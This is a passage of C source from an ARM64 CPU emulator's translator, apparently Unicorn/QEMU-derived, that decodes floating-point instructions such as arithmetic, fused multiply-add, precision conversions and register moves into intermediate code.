data-processing (1 source) - double precision */ static void handle_fp_1src_double(DisasContext *s, int opcode, int rd, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; void (*gen_fpst)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_ptr) = NULL; TCGv_i64 tcg_op, tcg_res; TCGv_ptr fpst; int rmode = -1; switch (opcode) { case 0x0: /* FMOV */ gen_gvec_fn2(s, false, rd, rn, tcg_gen_gvec_mov, 0); return; } tcg_op = read_fp_dreg(s, rn); tcg_res = tcg_temp_new_i64(tcg_ctx); switch (opcode) { case 0x1: /* FABS */ gen_helper_vfp_absd(tcg_ctx, tcg_res, tcg_op); goto done; case 0x2: /* FNEG */ gen_helper_vfp_negd(tcg_ctx, tcg_res, tcg_op); goto done; case 0x3: /* FSQRT */ gen_helper_vfp_sqrtd(tcg_ctx, tcg_res, tcg_op, tcg_ctx->cpu_env); goto done; case 0x8: /* FRINTN */ case 0x9: /* FRINTP */ case 0xa: /* FRINTM */ case 0xb: /* FRINTZ */ case 0xc: /* FRINTA */ rmode = arm_rmode_to_sf(opcode & 7); gen_fpst = gen_helper_rintd; break; case 0xe: /* FRINTX */ gen_fpst = gen_helper_rintd_exact; break; case 0xf: /* FRINTI */ gen_fpst = gen_helper_rintd; break; case 0x10: /* FRINT32Z */ rmode = float_round_to_zero; gen_fpst = gen_helper_frint32_d; break; case 0x11: /* FRINT32X */ gen_fpst = gen_helper_frint32_d; break; case 0x12: /* FRINT64Z */ rmode = float_round_to_zero; gen_fpst = gen_helper_frint64_d; break; case 0x13: /* FRINT64X */ gen_fpst = gen_helper_frint64_d; break; default: g_assert_not_reached(); } fpst = get_fpstatus_ptr(tcg_ctx, false); if (rmode >= 0) { TCGv_i32 tcg_rmode = tcg_const_i32(tcg_ctx, rmode); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); gen_fpst(tcg_ctx, tcg_res, tcg_op, fpst); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, fpst); tcg_temp_free_i32(tcg_ctx, tcg_rmode); } else { gen_fpst(tcg_ctx, tcg_res, tcg_op, fpst); } tcg_temp_free_ptr(tcg_ctx, fpst); done: write_fp_dreg(s, rd, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_op); tcg_temp_free_i64(tcg_ctx, tcg_res); } static void handle_fp_fcvt(DisasContext *s, int opcode, int rd, int rn, int dtype, int ntype) { TCGContext *tcg_ctx = s->uc->tcg_ctx; switch (ntype) { case 0x0: { TCGv_i32 tcg_rn = read_fp_sreg(s, rn); if (dtype == 1) { /* Single to double */ TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_fcvtds(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); write_fp_dreg(s, rd, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rd); } else { /* Single to half */ TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); TCGv_i32 ahp = get_ahp_flag(tcg_ctx); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); gen_helper_vfp_fcvt_f32_to_f16(tcg_ctx, tcg_rd, tcg_rn, fpst, ahp); /* write_fp_sreg is OK here because top half of tcg_rd is zero */ write_fp_sreg(s, rd, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rd); tcg_temp_free_i32(tcg_ctx, ahp); tcg_temp_free_ptr(tcg_ctx, fpst); } tcg_temp_free_i32(tcg_ctx, tcg_rn); break; } case 0x1: { TCGv_i64 tcg_rn = read_fp_dreg(s, rn); TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); if (dtype == 0) { /* Double to single */ gen_helper_vfp_fcvtsd(tcg_ctx, tcg_rd, tcg_rn, tcg_ctx->cpu_env); } else { TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); TCGv_i32 ahp = get_ahp_flag(tcg_ctx); /* Double to half */ gen_helper_vfp_fcvt_f64_to_f16(tcg_ctx, tcg_rd, tcg_rn, fpst, ahp); /* write_fp_sreg is OK here because top half of tcg_rd is zero */ tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, ahp); } write_fp_sreg(s, rd, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rn); break; } case 0x3: { TCGv_i32 tcg_rn = read_fp_sreg(s, rn); TCGv_ptr tcg_fpst = get_fpstatus_ptr(tcg_ctx, false); 
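/* Half-precision source: fetch the AHP (alternative half-precision)
 * flag and discard any junk above bits [15:0] before widening.
 */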
TCGv_i32 tcg_ahp = get_ahp_flag(tcg_ctx); tcg_gen_ext16u_i32(tcg_ctx, tcg_rn, tcg_rn); if (dtype == 0) { /* Half to single */ TCGv_i32 tcg_rd = tcg_temp_new_i32(tcg_ctx); gen_helper_vfp_fcvt_f16_to_f32(tcg_ctx, tcg_rd, tcg_rn, tcg_fpst, tcg_ahp); write_fp_sreg(s, rd, tcg_rd); tcg_temp_free_i32(tcg_ctx, tcg_rd); } else { /* Half to double */ TCGv_i64 tcg_rd = tcg_temp_new_i64(tcg_ctx); gen_helper_vfp_fcvt_f16_to_f64(tcg_ctx, tcg_rd, tcg_rn, tcg_fpst, tcg_ahp); write_fp_dreg(s, rd, tcg_rd); tcg_temp_free_i64(tcg_ctx, tcg_rd); } tcg_temp_free_i32(tcg_ctx, tcg_rn); tcg_temp_free_ptr(tcg_ctx, tcg_fpst); tcg_temp_free_i32(tcg_ctx, tcg_ahp); break; } default: abort(); } } /* Floating point data-processing (1 source) * 31 30 29 28 24 23 22 21 20 15 14 10 9 5 4 0 * +---+---+---+-----------+------+---+--------+-----------+------+------+ * | M | 0 | S | 1 1 1 1 0 | type | 1 | opcode | 1 0 0 0 0 | Rn | Rd | * +---+---+---+-----------+------+---+--------+-----------+------+------+ */ static void disas_fp_1src(DisasContext *s, uint32_t insn) { int mos = extract32(insn, 29, 3); int type = extract32(insn, 22, 2); int opcode = extract32(insn, 15, 6); int rn = extract32(insn, 5, 5); int rd = extract32(insn, 0, 5); if (mos) { unallocated_encoding(s); return; } switch (opcode) { case 0x4: case 0x5: case 0x7: { /* FCVT between half, single and double precision */ int dtype = extract32(opcode, 0, 2); if (type == 2 || dtype == type) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_fp_fcvt(s, opcode, rd, rn, dtype, type); break; } case 0x10: /* FRINT{32,64}{X,Z} */ case 0x11: /* FRINT{32,64}{X,Z} */ case 0x12: /* FRINT{32,64}{X,Z} */ case 0x13: /* FRINT{32,64}{X,Z} */ if (type > 1 || !dc_isar_feature(aa64_frint, s)) { unallocated_encoding(s); return; } /* fall through */ case 0x0: case 0x1: case 0x2: case 0x3: case 0x8: case 0x9: case 0xa: case 0xb: case 0xc: case 0xe: case 0xf: /* 32-to-32 and 64-to-64 ops */ switch (type) { case 0: if (!fp_access_check(s)) { return; } handle_fp_1src_single(s, opcode, rd, rn); break; case 1: if (!fp_access_check(s)) { return; } handle_fp_1src_double(s, opcode, rd, rn); break; case 3: if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_fp_1src_half(s, opcode, rd, rn); break; default: unallocated_encoding(s); } break; default: unallocated_encoding(s); break; } } /* Floating-point data-processing (2 source) - single precision */ static void handle_fp_2src_single(DisasContext *s, int opcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_op1; TCGv_i32 tcg_op2; TCGv_i32 tcg_res; TCGv_ptr fpst; tcg_res = tcg_temp_new_i32(tcg_ctx); fpst = get_fpstatus_ptr(tcg_ctx, false); tcg_op1 = read_fp_sreg(s, rn); tcg_op2 = read_fp_sreg(s, rm); switch (opcode) { case 0x0: /* FMUL */ gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1: /* FDIV */ gen_helper_vfp_divs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2: /* FADD */ gen_helper_vfp_adds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3: /* FSUB */ gen_helper_vfp_subs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x4: /* FMAX */ gen_helper_vfp_maxs(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5: /* FMIN */ gen_helper_vfp_mins(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x6: /* FMAXNM */ gen_helper_vfp_maxnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7: /* FMINNM */ gen_helper_vfp_minnums(tcg_ctx, tcg_res, tcg_op1, tcg_op2, 
fpst); break; case 0x8: /* FNMUL */ gen_helper_vfp_muls(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); gen_helper_vfp_negs(tcg_ctx, tcg_res, tcg_res); break; } write_fp_sreg(s, rd, tcg_res); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_res); } /* Floating-point data-processing (2 source) - double precision */ static void handle_fp_2src_double(DisasContext *s, int opcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_op1; TCGv_i64 tcg_op2; TCGv_i64 tcg_res; TCGv_ptr fpst; tcg_res = tcg_temp_new_i64(tcg_ctx); fpst = get_fpstatus_ptr(tcg_ctx, false); tcg_op1 = read_fp_dreg(s, rn); tcg_op2 = read_fp_dreg(s, rm); switch (opcode) { case 0x0: /* FMUL */ gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1: /* FDIV */ gen_helper_vfp_divd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2: /* FADD */ gen_helper_vfp_addd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3: /* FSUB */ gen_helper_vfp_subd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x4: /* FMAX */ gen_helper_vfp_maxd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5: /* FMIN */ gen_helper_vfp_mind(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x6: /* FMAXNM */ gen_helper_vfp_maxnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7: /* FMINNM */ gen_helper_vfp_minnumd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x8: /* FNMUL */ gen_helper_vfp_muld(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); gen_helper_vfp_negd(tcg_ctx, tcg_res, tcg_res); break; } write_fp_dreg(s, rd, tcg_res); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_res); } /* Floating-point data-processing (2 source) - half precision */ static void handle_fp_2src_half(DisasContext *s, int opcode, int rd, int rn, int rm) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_op1; TCGv_i32 tcg_op2; TCGv_i32 tcg_res; TCGv_ptr fpst; tcg_res = tcg_temp_new_i32(tcg_ctx); fpst = get_fpstatus_ptr(tcg_ctx, true); tcg_op1 = read_fp_hreg(s, rn); tcg_op2 = read_fp_hreg(s, rm); switch (opcode) { case 0x0: /* FMUL */ gen_helper_advsimd_mulh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x1: /* FDIV */ gen_helper_advsimd_divh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x2: /* FADD */ gen_helper_advsimd_addh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x3: /* FSUB */ gen_helper_advsimd_subh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x4: /* FMAX */ gen_helper_advsimd_maxh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x5: /* FMIN */ gen_helper_advsimd_minh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x6: /* FMAXNM */ gen_helper_advsimd_maxnumh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x7: /* FMINNM */ gen_helper_advsimd_minnumh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); break; case 0x8: /* FNMUL */ gen_helper_advsimd_mulh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, fpst); tcg_gen_xori_i32(tcg_ctx, tcg_res, tcg_res, 0x8000); break; default: g_assert_not_reached(); } write_fp_sreg(s, rd, tcg_res); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_res); } /* Floating point data-processing (2 source) * 31 30 29 28 24 23 22 21 20 16 15 12 11 10 9 5 4 0 * +---+---+---+-----------+------+---+------+--------+-----+------+------+ * | M | 0 | S | 1 1 1 
1 0 | type | 1 | Rm | opcode | 1 0 | Rn | Rd | * +---+---+---+-----------+------+---+------+--------+-----+------+------+ */ static void disas_fp_2src(DisasContext *s, uint32_t insn) { int mos = extract32(insn, 29, 3); int type = extract32(insn, 22, 2); int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int rm = extract32(insn, 16, 5); int opcode = extract32(insn, 12, 4); if (opcode > 8 || mos) { unallocated_encoding(s); return; } switch (type) { case 0: if (!fp_access_check(s)) { return; } handle_fp_2src_single(s, opcode, rd, rn, rm); break; case 1: if (!fp_access_check(s)) { return; } handle_fp_2src_double(s, opcode, rd, rn, rm); break; case 3: if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_fp_2src_half(s, opcode, rd, rn, rm); break; default: unallocated_encoding(s); } } /* Floating-point data-processing (3 source) - single precision */ static void handle_fp_3src_single(DisasContext *s, bool o0, bool o1, int rd, int rn, int rm, int ra) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_op1, tcg_op2, tcg_op3; TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); tcg_op1 = read_fp_sreg(s, rn); tcg_op2 = read_fp_sreg(s, rm); tcg_op3 = read_fp_sreg(s, ra); /* These are fused multiply-add, and must be done as one * floating point operation with no rounding between the * multiplication and addition steps. * NB that doing the negations here as separate steps is * correct : an input NaN should come out with its sign bit * flipped if it is a negated-input. */ if (o1 == true) { gen_helper_vfp_negs(tcg_ctx, tcg_op3, tcg_op3); } if (o0 != o1) { gen_helper_vfp_negs(tcg_ctx, tcg_op1, tcg_op1); } gen_helper_vfp_muladds(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_op3, fpst); write_fp_sreg(s, rd, tcg_res); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_op3); tcg_temp_free_i32(tcg_ctx, tcg_res); } /* Floating-point data-processing (3 source) - double precision */ static void handle_fp_3src_double(DisasContext *s, bool o0, bool o1, int rd, int rn, int rm, int ra) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 tcg_op1, tcg_op2, tcg_op3; TCGv_i64 tcg_res = tcg_temp_new_i64(tcg_ctx); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, false); tcg_op1 = read_fp_dreg(s, rn); tcg_op2 = read_fp_dreg(s, rm); tcg_op3 = read_fp_dreg(s, ra); /* These are fused multiply-add, and must be done as one * floating point operation with no rounding between the * multiplication and addition steps. * NB that doing the negations here as separate steps is * correct : an input NaN should come out with its sign bit * flipped if it is a negated-input. 
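* For reference, the o1/o0 combinations used by these 3-source ops
* (mapping inferred from the negation logic below) correspond to:
*   o1 = 0, o0 = 0: FMADD   rd =  ra + rn * rm  (no negation)
*   o1 = 0, o0 = 1: FMSUB   rd =  ra - rn * rm  (negate rn)
*   o1 = 1, o0 = 0: FNMADD  rd = -ra - rn * rm  (negate ra and rn)
*   o1 = 1, o0 = 1: FNMSUB  rd = -ra + rn * rm  (negate ra)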
*/ if (o1 == true) { gen_helper_vfp_negd(tcg_ctx, tcg_op3, tcg_op3); } if (o0 != o1) { gen_helper_vfp_negd(tcg_ctx, tcg_op1, tcg_op1); } gen_helper_vfp_muladdd(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_op3, fpst); write_fp_dreg(s, rd, tcg_res); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i64(tcg_ctx, tcg_op1); tcg_temp_free_i64(tcg_ctx, tcg_op2); tcg_temp_free_i64(tcg_ctx, tcg_op3); tcg_temp_free_i64(tcg_ctx, tcg_res); } /* Floating-point data-processing (3 source) - half precision */ static void handle_fp_3src_half(DisasContext *s, bool o0, bool o1, int rd, int rn, int rm, int ra) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 tcg_op1, tcg_op2, tcg_op3; TCGv_i32 tcg_res = tcg_temp_new_i32(tcg_ctx); TCGv_ptr fpst = get_fpstatus_ptr(tcg_ctx, true); tcg_op1 = read_fp_hreg(s, rn); tcg_op2 = read_fp_hreg(s, rm); tcg_op3 = read_fp_hreg(s, ra); /* These are fused multiply-add, and must be done as one * floating point operation with no rounding between the * multiplication and addition steps. * NB that doing the negations here as separate steps is * correct : an input NaN should come out with its sign bit * flipped if it is a negated-input. */ if (o1 == true) { tcg_gen_xori_i32(tcg_ctx, tcg_op3, tcg_op3, 0x8000); } if (o0 != o1) { tcg_gen_xori_i32(tcg_ctx, tcg_op1, tcg_op1, 0x8000); } gen_helper_advsimd_muladdh(tcg_ctx, tcg_res, tcg_op1, tcg_op2, tcg_op3, fpst); write_fp_sreg(s, rd, tcg_res); tcg_temp_free_ptr(tcg_ctx, fpst); tcg_temp_free_i32(tcg_ctx, tcg_op1); tcg_temp_free_i32(tcg_ctx, tcg_op2); tcg_temp_free_i32(tcg_ctx, tcg_op3); tcg_temp_free_i32(tcg_ctx, tcg_res); } /* Floating point data-processing (3 source) * 31 30 29 28 24 23 22 21 20 16 15 14 10 9 5 4 0 * +---+---+---+-----------+------+----+------+----+------+------+------+ * | M | 0 | S | 1 1 1 1 1 | type | o1 | Rm | o0 | Ra | Rn | Rd | * +---+---+---+-----------+------+----+------+----+------+------+------+ */ static void disas_fp_3src(DisasContext *s, uint32_t insn) { int mos = extract32(insn, 29, 3); int type = extract32(insn, 22, 2); int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int ra = extract32(insn, 10, 5); int rm = extract32(insn, 16, 5); bool o0 = extract32(insn, 15, 1); bool o1 = extract32(insn, 21, 1); if (mos) { unallocated_encoding(s); return; } switch (type) { case 0: if (!fp_access_check(s)) { return; } handle_fp_3src_single(s, o0, o1, rd, rn, rm, ra); break; case 1: if (!fp_access_check(s)) { return; } handle_fp_3src_double(s, o0, o1, rd, rn, rm, ra); break; case 3: if (!dc_isar_feature(aa64_fp16, s)) { unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_fp_3src_half(s, o0, o1, rd, rn, rm, ra); break; default: unallocated_encoding(s); } } /* Floating point immediate * 31 30 29 28 24 23 22 21 20 13 12 10 9 5 4 0 * +---+---+---+-----------+------+---+------------+-------+------+------+ * | M | 0 | S | 1 1 1 1 0 | type | 1 | imm8 | 1 0 0 | imm5 | Rd | * +---+---+---+-----------+------+---+------------+-------+------+------+ */ static void disas_fp_imm(DisasContext *s, uint32_t insn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int rd = extract32(insn, 0, 5); int imm5 = extract32(insn, 5, 5); int imm8 = extract32(insn, 13, 8); int type = extract32(insn, 22, 2); int mos = extract32(insn, 29, 3); uint64_t imm; TCGv_i64 tcg_res; MemOp sz; if (mos || imm5) { unallocated_encoding(s); return; } switch (type) { case 0: sz = MO_32; break; case 1: sz = MO_64; break; case 3: sz = MO_16; if (dc_isar_feature(aa64_fp16, s)) { break; } /* fallthru */ default: unallocated_encoding(s); 
return; } if (!fp_access_check(s)) { return; } imm = vfp_expand_imm(sz, imm8); tcg_res = tcg_const_i64(tcg_ctx, imm); write_fp_dreg(s, rd, tcg_res); tcg_temp_free_i64(tcg_ctx, tcg_res); } /* Handle floating point <=> fixed point conversions. Note that we can * also deal with fp <=> integer conversions as a special case (scale == 64) * OPTME: consider handling that special case specially or at least skipping * the call to scalbn in the helpers for zero shifts. */ static void handle_fpfpcvt(DisasContext *s, int rd, int rn, int opcode, bool itof, int rmode, int scale, int sf, int type) { TCGContext *tcg_ctx = s->uc->tcg_ctx; bool is_signed = !(opcode & 1); TCGv_ptr tcg_fpstatus; TCGv_i32 tcg_shift, tcg_single; TCGv_i64 tcg_double; tcg_fpstatus = get_fpstatus_ptr(tcg_ctx, type == 3); tcg_shift = tcg_const_i32(tcg_ctx, 64 - scale); if (itof) { TCGv_i64 tcg_int = cpu_reg(s, rn); if (!sf) { TCGv_i64 tcg_extend = new_tmp_a64(s); if (is_signed) { tcg_gen_ext32s_i64(tcg_ctx, tcg_extend, tcg_int); } else { tcg_gen_ext32u_i64(tcg_ctx, tcg_extend, tcg_int); } tcg_int = tcg_extend; } switch (type) { case 1: /* float64 */ tcg_double = tcg_temp_new_i64(tcg_ctx); if (is_signed) { gen_helper_vfp_sqtod(tcg_ctx, tcg_double, tcg_int, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_uqtod(tcg_ctx, tcg_double, tcg_int, tcg_shift, tcg_fpstatus); } write_fp_dreg(s, rd, tcg_double); tcg_temp_free_i64(tcg_ctx, tcg_double); break; case 0: /* float32 */ tcg_single = tcg_temp_new_i32(tcg_ctx); if (is_signed) { gen_helper_vfp_sqtos(tcg_ctx, tcg_single, tcg_int, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_uqtos(tcg_ctx, tcg_single, tcg_int, tcg_shift, tcg_fpstatus); } write_fp_sreg(s, rd, tcg_single); tcg_temp_free_i32(tcg_ctx, tcg_single); break; case 3: /* float16 */ tcg_single = tcg_temp_new_i32(tcg_ctx); if (is_signed) { gen_helper_vfp_sqtoh(tcg_ctx, tcg_single, tcg_int, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_uqtoh(tcg_ctx, tcg_single, tcg_int, tcg_shift, tcg_fpstatus); } write_fp_sreg(s, rd, tcg_single); tcg_temp_free_i32(tcg_ctx, tcg_single); break; default: g_assert_not_reached(); } } else { TCGv_i64 tcg_int = cpu_reg(s, rd); TCGv_i32 tcg_rmode; if (extract32(opcode, 2, 1)) { /* There are too many rounding modes to all fit into rmode, * so FCVTA[US] is a special case. 
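* (rmode comes from a 2-bit instruction field, which can only encode
* four rounding modes; ties-away is a fifth, so FCVTAS/FCVTAU signal
* it via bit 2 of the opcode instead and we force FPROUNDING_TIEAWAY
* below.)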
*/ rmode = FPROUNDING_TIEAWAY; } tcg_rmode = tcg_const_i32(tcg_ctx, arm_rmode_to_sf(rmode)); gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); switch (type) { case 1: /* float64 */ tcg_double = read_fp_dreg(s, rn); if (is_signed) { if (!sf) { gen_helper_vfp_tosld(tcg_ctx, tcg_int, tcg_double, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_tosqd(tcg_ctx, tcg_int, tcg_double, tcg_shift, tcg_fpstatus); } } else { if (!sf) { gen_helper_vfp_tould(tcg_ctx, tcg_int, tcg_double, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_touqd(tcg_ctx, tcg_int, tcg_double, tcg_shift, tcg_fpstatus); } } if (!sf) { tcg_gen_ext32u_i64(tcg_ctx, tcg_int, tcg_int); } tcg_temp_free_i64(tcg_ctx, tcg_double); break; case 0: /* float32 */ tcg_single = read_fp_sreg(s, rn); if (sf) { if (is_signed) { gen_helper_vfp_tosqs(tcg_ctx, tcg_int, tcg_single, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_touqs(tcg_ctx, tcg_int, tcg_single, tcg_shift, tcg_fpstatus); } } else { TCGv_i32 tcg_dest = tcg_temp_new_i32(tcg_ctx); if (is_signed) { gen_helper_vfp_tosls(tcg_ctx, tcg_dest, tcg_single, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_touls(tcg_ctx, tcg_dest, tcg_single, tcg_shift, tcg_fpstatus); } tcg_gen_extu_i32_i64(tcg_ctx, tcg_int, tcg_dest); tcg_temp_free_i32(tcg_ctx, tcg_dest); } tcg_temp_free_i32(tcg_ctx, tcg_single); break; case 3: /* float16 */ tcg_single = read_fp_sreg(s, rn); if (sf) { if (is_signed) { gen_helper_vfp_tosqh(tcg_ctx, tcg_int, tcg_single, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_touqh(tcg_ctx, tcg_int, tcg_single, tcg_shift, tcg_fpstatus); } } else { TCGv_i32 tcg_dest = tcg_temp_new_i32(tcg_ctx); if (is_signed) { gen_helper_vfp_toslh(tcg_ctx, tcg_dest, tcg_single, tcg_shift, tcg_fpstatus); } else { gen_helper_vfp_toulh(tcg_ctx, tcg_dest, tcg_single, tcg_shift, tcg_fpstatus); } tcg_gen_extu_i32_i64(tcg_ctx, tcg_int, tcg_dest); tcg_temp_free_i32(tcg_ctx, tcg_dest); } tcg_temp_free_i32(tcg_ctx, tcg_single); break; default: g_assert_not_reached(); } gen_helper_set_rmode(tcg_ctx, tcg_rmode, tcg_rmode, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_rmode); } tcg_temp_free_ptr(tcg_ctx, tcg_fpstatus); tcg_temp_free_i32(tcg_ctx, tcg_shift); } /* Floating point <-> fixed point conversions * 31 30 29 28 24 23 22 21 20 19 18 16 15 10 9 5 4 0 * +----+---+---+-----------+------+---+-------+--------+-------+------+------+ * | sf | 0 | S | 1 1 1 1 0 | type | 0 | rmode | opcode | scale | Rn | Rd | * +----+---+---+-----------+------+---+-------+--------+-------+------+------+ */ static void disas_fp_fixed_conv(DisasContext *s, uint32_t insn) { int rd = extract32(insn, 0, 5); int rn = extract32(insn, 5, 5); int scale = extract32(insn, 10, 6); int opcode = extract32(insn, 16, 3); int rmode = extract32(insn, 19, 2); int type = extract32(insn, 22, 2); bool sbit = extract32(insn, 29, 1); bool sf = extract32(insn, 31, 1); bool itof; if (sbit || (!sf && scale < 32)) { unallocated_encoding(s); return; } switch (type) { case 0: /* float32 */ case 1: /* float64 */ break; case 3: /* float16 */ if (dc_isar_feature(aa64_fp16, s)) { break; } /* fallthru */ default: unallocated_encoding(s); return; } switch ((rmode << 3) | opcode) { case 0x2: /* SCVTF */ case 0x3: /* UCVTF */ itof = true; break; case 0x18: /* FCVTZS */ case 0x19: /* FCVTZU */ itof = false; break; default: unallocated_encoding(s); return; } if (!fp_access_check(s)) { return; } handle_fpfpcvt(s, rd, rn, opcode, itof, FPROUNDING_ZERO, scale, sf, type); } static void handle_fmov(DisasContext *s, int rd, int rn, int type, bool itof) { 
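/* The type field used by the switch cases below encodes the width:
 * 0 = 32-bit (S reg), 1 = 64-bit (D reg), 2 = top 64 bits of the
 * 128-bit Q reg, 3 = 16-bit (half precision, FEAT_FP16). */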
TCGContext *tcg_ctx = s->uc->tcg_ctx; /* FMOV: gpr to or from float, double, or top half of quad fp reg, * without conversion. */ if (itof) { TCGv_i64 tcg_rn = cpu_reg(s, rn); TCGv_i64 tmp; switch (type) { case 0: /* 32 bit */ tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32u_i64(tcg_ctx, tmp, tcg_rn); write_fp_dreg(s, rd, tmp); tcg_temp_free_i64(tcg_ctx, tmp); break; case 1: /* 64 bit */ write_fp_dreg(s, rd, tcg_rn); break; case 2: /* 64 bit to top half. */ tcg_gen_st_i64(tcg_ctx, tcg_rn, tcg_ctx->cpu_env, fp_reg_hi_offset(s, rd)); clear_vec_high(s, true, rd); break; case 3: /* 16 bit */ tmp = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext16u_i64(tcg_ctx, tmp, tcg_rn); write_fp_dreg(s, rd, tmp); tcg_temp_free_i64(tcg_ctx, tmp); break; default: g_assert_not_reached(); } } else { TCGv_i64 tcg_rd = cpu_reg(s, rd); switch (type) { case 0: /* 32 bit */ tcg_gen_ld32u_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_offset(s, rn, MO_32)); break; case 1: /* 64 bit */ tcg_gen_ld_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_offset(s, rn, MO_64)); break; case 2: /* 64 bits from top half */ tcg_gen_ld_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_hi_offset(s, rn)); break; case 3: /* 16 bit */ tcg_gen_ld16u_i64(tcg_ctx, tcg_rd, tcg_ctx->cpu_env, fp_reg_offset(s, rn, MO_16)); break; default: g_assert_not_reached(); } } } static void handle_fjcvtzs(DisasContext *s, int rd, int rn) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i64 t = read_fp_dreg(s, rn); TCGv_ptr fpstatus = get_fpstatus_ptr(tcg_ctx, false); gen_helper_fjcvtzs(tcg_ctx, t, t, fpstatus); tcg_temp_free_ptr(tcg_ctx, fpstatus); tcg_gen_ext32u_i64(tcg_ctx, cpu_reg(s, rd), t); 